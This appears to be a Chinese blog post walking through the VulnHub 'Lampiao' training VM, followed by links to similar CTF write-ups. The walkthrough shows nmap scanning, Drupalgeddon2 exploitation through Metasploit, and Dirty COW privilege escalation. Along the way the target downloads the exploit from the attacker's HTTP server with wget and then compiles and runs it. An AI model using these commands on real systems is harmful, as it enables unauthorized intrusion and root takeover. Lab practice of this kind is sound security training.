渗透测试之靶机试炼(五)

最新推荐文章于 2024-08-20 11:30:56 发布
最新推荐文章于 2024-08-20 11:30:56 发布
阅读量554 收藏 4
点赞数 3
分类专栏: 靶机试炼 文章标签: linux提权 脏牛 CTF 渗透测试 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/simple___sunny/article/details/86681212
版权

靶机简介

靶机地址:
https://download.vulnhub.com/lampiao/Lampiao.zip

运行环境:
VirtualBox

攻击测试机环境
kali
win 10

工具简介
msf
dirb
nmap
python

靶机网卡设置

三台虚拟主机在同一局域网即可
作者这里直接将靶机桥接到win 10 和kali虚拟机所在网段。
在这里插入图片描述

信息收集

这个靶机坑比较多,信息收集过程中找到许多看似有用信息,但是并没用利用成功,如有其它人找到其它方法可以留言交流一下。
老规矩,nmap主机发现:
命令:nmap 10.211.55.0/24
在这里插入图片描述只发现了22端口,进行了ssh爆破,无果,重新扫描一次全端口。
命令:nmap 10.211.55.28 -p1-65535 -v -A
在这里插入图片描述发现端口1898 访问
在这里插入图片描述之后在web页面是上实验好久,注入,爆破都没成功,不过在目录爆破发现一个robots.txt文件 查看
在这里插入图片描述挨个看了一遍,发现这个日志文件
在这里插入图片描述是drupal的更新日志文件,这里最后的更新时间的2017年2月1日版本是7.54,直接在kalI的maf上查找exp
命令 mafconsole
search drupal
在这里插入图片描述找到一个2018年更新的exp,使用改exp,设置目标ip和目标端口,如果不熟悉这个exp,可以使用info命令查看所需参数。
命令 use exploit/unix/webapp/drupal_drupalgeddon2
在这里插入图片描述设置好参数,执行exp
在这里插入图片描述执行成功,获取到一个回话,这里我们直接用这个回话建立一个交互式shell
命令 shell
python -c ‘import pty; pty.spawn("/bin/bash")’
在这里插入图片描述

提权

拿到shell后就是提权了,作者对提权不是很熟悉,所以踏了许多的坑,其实有点经验的查看一下系统内核就可以知道怎么提权了,不废话了,查看系统版本及内核。
命令 cat /proc/version
在这里插入图片描述最后经过作者一系列测试,最后使用脏牛提权成功CVE-2016-5195
找了好几个exp,只有这个成功了,作者菜逼,大佬自由选择
exp:https://github.com/gbonacini/CVE-2016-5195
这个靶机没有git命令,所以只能在本地下载,然后打包上传到服务器上
下载命令 git clone https://github.com/gbonacini/CVE-2016-5195
在这里插入图片描述打包该文件夹
命令 tar -zcvf /root/123.tar CVE-2016-5195/
在这里插入图片描述使用python开启一个web服务,供靶机下载该文件
命令 python -m SimpleHTTPServer 8888
在这里插入图片描述
靶机利用获得shell进行下载
命令 wget http://10.211.55.8:8888/123.tar
在这里插入图片描述如图,已经将该文件下载到靶机上,接下来解压
命令: tar -zxvf /var/www/html/123.tar
在这里插入图片描述解压成功后,进入该目录
命令 cd CVE-2016-5195
在这里插入图片描述然后对该文件进行编译
命令 make
在这里插入图片描述生成可执行文件 dcow 利用他进行提权
命令 ./dcow -s
在这里插入图片描述获取到root权限。

一只会飞天的松鼠
关注
专栏目录
靶机实战(Super-Mario-Host-v1.0.1)
weixin_45605313的博客
07-14 571
超级玛丽实验环境实验过程信息收集主机发现端口扫描服务发现目录扫描漏洞发现漏洞利用漏洞发现 实验环境 靶机:超级玛丽(Super-Mario-Host-v1.0.1) 测试机:kali(IP:192.168.186.128),win10 实验过程 信息收集 主机发现 netdiscover -I eth0 -r 192.168.186.0/24 nmap -sn 192.168.186.0/24 arp-scan -l ,arp-scan 192.168.186.0/24 端口扫描 masscan -p
VulnHub-Lampiao-靶机渗透学习
嗯嗯呐的博客
11-04 754
靶机地址:https://www.vulnhub.com/entry/lampi 目标:得到root权限&找到flag.txt 作者:嗯嗯呐 一、 信息采集 开始我们的操作。 使用nmap扫描,确认靶机IP地址 扫描靶机端口,看看主机上有那个服务 字典生成工具 cewl cewl是一个ruby开发的应用程序,你可以给它的爬虫指定url的指定深度还可以添加额外的外部连接,接下来cewl会给你返回一个字典文件。 默认方法: 输入下列命令之后,爬虫会根据指定的url和深度进行爬取,然后打印可用于密码破
Lampiao靶场之脏牛提权
最新发布
zhouA0221的博客
08-20 421
Linux内核里有个9年高龄的漏洞:脏牛提权漏洞,在16年10月18日之前的Linux未打补丁则会有此漏洞。3、Linux16年版本在内核里有个9年高龄的漏洞:脏牛提权漏洞,在16年10月18日之前的Linux未打补丁则会有此漏洞。目标主机开启了22端为SSH服务,把web放在了1898端口。2、使用msf获取shell时要把目标端口号改为1898端口。拿到root权限,切换到root工作目录,拿到flag。1、目标主机web服务器运行在1898端口。目标主机使用的CMS是Drupal 7版本。
渗透靶机测试--billu_b0x2--学习笔记
Sacrifice_li的博客
05-14 941
最近找了几个渗透靶机来玩玩,主要目的是为了获取root权限。这次的靶机名字是billu_b0x2,下载地址 攻击机ip:192.168.6.128 靶机 ip:192.168.6.132 1.打开目标靶机,正常用nmap扫描一下目标靶机的ip, 使用命令 nmap -sP 192.168.6.0/24 可以找到目标靶机的ip地址为192.168.6.132 2.寻找靶机开放端口 使用命令 nmap -p- -A -T4 192...
【HTB系列】靶机Bitlab的渗透测试
大方子
01-23 2924
https://note.youdao.com/ynoteshare1/index.html?id=4af5cf2cde031f1bbd9dd5d434661fb9&type=note
【HTB系列】靶机FriendZone的渗透测试
大方子
07-24 1212
不知道为什么,CSDN文字和图片批量黏贴时,老是出现转存失败。 直接分享有道的文档,在弄一遍太累了 文档:【HTB系列】靶机FriendZone的渗透测试.... 链接:http://note.youdao.com/noteshare?id=6799653dc6fce316111bc0f2ea1c0b79&sub=594B0497FF3249C6ACF9D29AEB62D9...
渗透测试靶机试炼(一)
热门推荐
simple___sunny的博客
01-10 1万+
1
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
渗透测试靶机试炼(八)
simple___sunny的博客
02-21 1132
靶机简介 靶机地址: https://download.vulnhub.com/trollcave/trollcave-v1-2.ova.torrent 运行环境: VirtualBox 攻击测试机环境 kali win 10 工具简介 nmap dirb python nc 靶机网卡设置 三台虚拟主机在同一局域网即可 作者这里直接将靶机桥接到win 10 和kali虚拟机所在网段。 信息收集 ...
渗透测试靶机试炼(二)
simple___sunny的博客
01-21 1508
123
渗透测试靶机试炼(十)
simple___sunny的博客
04-04 1063
靶机简介 靶机地址: https://download.vulnhub.com/homeless/ 运行环境: VirtualBox 攻击测试机环境 kali win 10 工具简介 nmap dirb python nc burp curl fastcoll tail 靶机网卡设置 三台虚拟主机在同一局域网即可 作者这里直接将靶机桥接到win 10 和kali虚拟机所在网段。 首先使用nmap进...
MS08-067靶机下载
边城浪子的博客
09-08 1710
利用Windows平台MS08-067漏洞,成功进行远程命令执行操作,无奈没有靶机实验,真实的互联网中也没有这样的漏洞啊。 MS08-067靶机下载地址 链接: https://pan.baidu.com/s/13IS0vBZTduDHdInOrO4pyQ 提取码: ip53
vulnhub靶机rava2渗透测试
Long_gone的博客
09-28 475
首先利用netdiscover这个工具来进行对靶机的IP扫描: netdiscover 然后可以判断出靶机IP为192.168.34.225,接着就用nmap扫描一下靶机的端口开放情况: nmap -A 192.168.34.225 发现靶机开放了22,80,111这3个端口,然后就先访问一下80端口: 接着就是用dirb工具扫描目录,进行目录的爆破: dirb http://192....
渗透测试实战2——bulldog1靶机入侵
浅浅的博客
04-25 997
一、实验环境 攻击机(Kali):192.168.247.160 靶机(bulldog1):192.168.247.148 二、实验步骤 (一)主动信息收集 1、主机发现 2、端口扫描 3、端口服务版本扫描 (二)Web渗透 http服务(80端口) 1、访问目标主机 没有发现什么有用信息。 2、网站指纹信息扫描(whatweb) ...
CTF之Tr0ll1 靶机渗透(FTP匿名登录 SSH爆破)
afei001
12-06 649
目录 练习环境 1.发现靶机,端口扫描 2.网站探测 3.对端口进行全扫描 4.FTP匿名登录,探测信息 5.尝试爆破SSH 6.内核漏洞提权,拿下flag 总结 练习环境 攻击机:kali 靶机:Tr0ll: 1 下载地址:https://download.vulnhub.com/tr0ll/Tr0ll.rar 1.发现靶机,端口扫描 root@kali:~# nmap -sV -O 100.100.100.14 Starting Nma...
kali渗透综合靶机(九)--Typhoon靶机
WY92139010的博客
05-11 676
kali渗透综合靶机(九)--Typhoon靶机 靶机下载地址:https://www.vulnhub.com/entry/typhoon-102,267/ 一、主机发现 1.netdiscover -i eth0 -r 192.168.10.0/24,进过分析,确定192.168.10.162是目标靶机    二、端口扫描 1. masscan --rate=10000 -...
b4_python与msf交互实现的自动攻击
yeshankuangrenaaaaa的博客
01-09 2225
本文是草稿,很多未整理完 ! 各位凑合着看先 延续b3文提到的思路,这里提供实现的方式。 step1 文件 startConfig.rc start_msf.py python借助pymsf模块与msf的msgrpc插件实现交互控制,那么前提就是我们已经启动了msf,并且加载了msgrpc插件,完成了msgrpc的配置。 我们这里利用msf中的resource script章节提到的.rc文件...
靶机渗透之peixun-server提权
克格莫(有需要的私信)
09-15 314
攻击机: 主机发现: 信息收集: 端口详细信息: 尝试访问80端口,发现其有一web站点可以访问: 对url:http://192.168.11.128/storypage_04.php?id=115进行测试,检查是否有SQL注入漏洞: 报错,此处应该有注入点。 爆破数据库名: 得到该数据库的所有数据库名:information_schema,mysql,performance_schema,tcic,test 爆当前使用的数据库为tcic: 爆表名:
Zico2靶机渗透测试实战指南
"该文档是关于使用Zico2作为靶机进行渗透测试的实战指南,主要涵盖实验环境的设置、信息收集以及渗透测试的步骤。Zico2是一个用于安全研究和教育的虚拟机,适用于练习渗透测试技术。" 在渗透测试领域,Zico2靶机...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值